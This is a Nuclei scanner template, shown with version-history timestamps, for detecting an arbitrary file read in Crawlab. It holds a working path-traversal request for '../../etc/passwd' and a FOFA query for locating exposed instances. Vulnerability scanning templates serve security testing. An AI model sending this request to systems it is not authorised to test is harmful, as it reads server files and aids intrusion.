nuclei-templates/http/vulnerabilities/other/crawlab-lfi.yaml

33 lines
740 B
YAML
Raw Normal View History

id: crawlab-lfi
2023-08-08 07:34:14 +00:00
info:
name: Crawlab - Arbitrary File Read
2023-08-08 07:34:14 +00:00
author: pussycat0x
severity: high
reference:
- https://github.com/Threekiii/Awesome-POC/blob/master/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/Crawlab%20file%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md
metadata:
max-request: 1
verified: true
fofa-query: title="Crawlab"
2023-08-08 08:12:25 +00:00
tags: crawlab,lfi
2023-08-08 07:34:14 +00:00
http:
- method: GET
path:
- "{{BaseURL}}/api/file?path=../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "root:.*:0:0:"
2023-08-08 08:12:25 +00:00
- "data\":\""
- "error\":"
condition: and
2023-08-08 07:34:14 +00:00
- type: status
status:
- 200